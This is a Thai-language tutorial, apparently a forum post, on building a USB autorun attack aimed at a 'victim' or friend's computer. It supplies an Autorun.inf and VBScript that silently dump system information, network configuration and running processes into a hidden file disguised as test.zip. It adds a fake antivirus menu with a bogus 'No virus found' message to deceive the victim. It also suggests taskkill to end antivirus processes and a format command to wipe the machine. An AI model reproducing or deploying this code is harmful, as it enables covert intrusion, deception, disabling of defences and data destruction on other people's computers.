คลิกทีเดียวเก็บทุกรายละเอียด, เป็นการเขียนสคริบเพื่อทำการเก็บรายละเอียดในเครื่องเหยื่อ

Step 1
สร้างไฟล์ขึ้นมาอันนึง ชื่อ Autorun.inf ในไฟล์ใส่ดังนี้

[autorun]
Shell\Open\Command=wscript.exe Penguin.vbs

แล้วเซฟซะ
สั่ง Hidden ด้วยก้อได้เพื่อความแนบเนียน
Step 2
สร้างไฟล์ Script vbs ขึ้นมา ตัวไฟล์สามารถผ่าน Antivirus สบายๆ เพราะเราไม่ได้สร้างไวรัส เราแค่เก็บรายละเอียดเครื่อง
เตรียมบุกตะหาก .. ก่อนอื่นสร้างไฟล์ชื่อ Penguin.vbs ขึ้นมา แล้วคลิก Edit ใส่ดังนี้

On Error Resume Next
Dim I,Fso,Self
Self = wscript.scriptfullname
Set Fso = Wscript.Createobject("Scripting.FileSystemObject")
Set I = Wscript.Createobject("wscript.shell")
Set F = Fso.getfile(Self)
I.run "explorer.exe " & Fso.getparentfoldername(Self),3,true
I.run "cmd.exe /c systeminfo > test.zip",0,true
I.run "cmd.exe /c ipconfig >> test.zip",0,true
I.run "cmd.exe /c tasklist >> test.zip",0,true
f.attributes = 2

Step 3
ก็อปไฟล์ทั้งหมดลง Handy Drive เตรียมลุย คราวนี้เวลา เราสั่ง Open หรือ ดับเบิ้ลคลิกมันก้อจะสร้างไฟล์ขึ้นมาชื่อว่า test.zip
เวลาจะเปิดก้อลากไปเปิดใน Notepad จะพบกับตับไตใส้พุงของเครื่อง แฉออกมาอย่างหมดเปลือก

>> Tip หากคุณคิดจะแฮกเครื่องเพื่อนที่น่ารัก แล้วเพื่อนบอกให้สแกนไวรัส คุณสามารถสร้างเมนูสแกนไวรัสหลอกๆโดย
เพิ่มข้อมูลในไฟล์ Autorun.inf ดังนี้ ( ต่อไปด้านล่างนะครับ )

Shell\Scan Virus with น็อต ประแจ แม่แรง = Scan Virus with Nod ไม่ครบ 32
Shell\Scan Virus with น็อต ประแจ แม่แรง\Command=wscript.exe Scan.vbs

แล้วสร้างไฟล์ Scan.vbs ไว้อีกอัน ข้างในใส่ ( อย่าลืมสั่งซ่อนนะครับ )

Dim Return
Return = Msgbox ("Scan virus is successfully" & _
vbcrlf & "No virus found นะจ๊ะ",0,"น็อต ประแจ แม่แรง Anti Virus ")

แล้วก้อปไฟล์ลงที่เดียวกัน
แต่คุณไม่ต้องซีเรียสเรื่อง Anti เพราะนี่ไม่ใช่ไวรัส อีกอย่างที่อยากให้สังเกตดู คือ ทัมไดรว์ จะไม่มี Autoplay ดังนั้นอย่าวางใจหากคลิกขวาแล้วไม่เจอAutoplay
ให้มาที่เมนูรัน แล้วพิมพ์ชื่อไดรว์ เลย เช่น ทัมม์ไดรว์ อยู่ไดรว์ H: ก้อ พิมพ์ H: แล้ว OK ไฟล์ Autorun จะไม่ถูกรันขึ้นมา
ให้คลิกที่ไฟล์ชื่อ penguin.vbs นะครับแล้วจะเห็น test.zip

หากใครต้องการเพิ่มความสามารถอีกก็เพิ่มไปได้นะครับ เช่น

I.run "cmd.exe /c netstat -na >> test.zip",0,true ' ไว้ดูพอร์ตที่เปิดอยู่
I.run "cmd.exe /c taskkill /f /im ชื่อโปรเซส.exe,0,true ' ไว้สั่ง End Process พวก Anti หรือ อะไรก้อได้

หรือ หากโหดกว่านั้นอีก คำสั่ง Format ครับ เตรียมลงวินโดวส์ใหม่ได้เลย

ดูตรงคำสั่งมันนะครับ

Object.run "ชื่อโปรแกรม ตามด้วย พารามิเตอร์ หรือ คำสั่งใช้งานต่างๆ , โหมดการรัน , การรีเทิร์นค่าต่างๆตอนเกิด Error ใส่ True นะครับ

โหมดการรัน

0 = Hides the window and activates another window.
1 = Activates and displays a window. If the window is minimized or maximized, the system restores it to its original size and position. An application should specify this flag when displaying the window for the first time.
2 = Activates the window and displays it as a minimized window.
3 = Activates the window and displays it as a maximized window.
4 = Displays a window in its most recent size and position. The active window remains active.
5 = Activates the window and displays it in its current size and position.
6 = Minimizes the specified window and activates the next top-level window in the Z order.
7 = Displays the window as a minimized window. The active window remains active.
8 = Displays the window in its current state. The active window remains active.
9 = Activates and displays the window. If the window is minimized or maximized, the system restores it to its original size and position. An application should specify this flag when restoring a minimized window.
10 = Sets the show-state based on the state of the program that started the application.

ลองเล่นดูนะครับ หากใครคิดเอาดีด้าน vbscript แนะนำ MSDN ของ Visual Studio 2005 ผมดูพวกไวยากรณ์จากที่นั่นแหละ หากใครเน็ตแรง
ดูแบบออนไลน์ก็ได้ครับที่ http://msdn2.microsoft.com/en-us/default.aspx